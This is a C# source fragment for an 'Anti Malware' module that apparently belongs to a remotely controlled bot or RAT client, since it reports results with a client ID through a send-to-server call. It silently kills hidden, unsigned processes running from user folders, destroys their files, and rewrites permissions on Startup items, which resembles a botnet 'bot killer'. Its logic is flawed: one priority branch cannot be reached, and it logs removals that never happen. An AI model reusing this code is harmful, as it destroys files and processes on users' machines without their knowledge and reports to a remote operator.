public bool IsFileMalicious(string fileloc)
{
if (fileloc.Contains(Application.ExecutablePath))
{
return(false);
}
if (fileloc.Contains("cmd"))
{
return(true);
}
if (fileloc.Contains("wscript"))
{
return(true);
}
if (fileloc.Contains(System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory()))
{
return(true);
}
if (WinTrust.VerifyEmbeddedSignature(fileloc) == true)
{
return(false);
}
if ((fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))))
{
return(true);
}
FileAttributes attributes;
attributes = File.GetAttributes(fileloc);
if ((attributes & FileAttributes.System) == FileAttributes.System)
{
return(true);
}
if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden)
{
return(true);
}
return(false);
}
public void Start()
{
mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams);
mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner...");
try
{
try
{
Process[] Proc = Process.GetProcesses();
string path;
for (int x = 0; x <= Proc.Length - 1; x++)
{
Process p = Proc[x];
try
{
path = System.IO.Path.GetFullPath(p.MainModule.FileName);
if (IsFileMalicious(path))
{
if (!WindowIsVisible(p.MainWindowTitle))
{
try
{
p.Kill();
mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName);
}
catch
{
}
DestroyFile(path);
killed = killed + 1;
}
}
}
catch { }
}
}
catch { }
string[] tehfilesandshit = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
foreach (var workload in tehfilesandshit)
{
if (WinTrust.VerifyEmbeddedSignature(workload) == false)
{
System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(workload);
DirectorySecurity FolderAcl = new DirectorySecurity();
FolderAcl.SetAccessRuleProtection(true, false);
FolderInfo.SetAccessControl(FolderAcl);
mwork.addlog("[Anti Malware] Removed Startup Item: " + workload);
}
}
}
catch { }
string priority = "";
if (killed == 0)
{
priority = "Info";
}
else if (killed == 1)
{
priority = "Log";
}
else if (killed > 2)
{
priority = "Priority";
}
else if (killed > 5)
{
priority = "Risk";
}
mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + ".");
mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString());
mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString());
mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!");
}
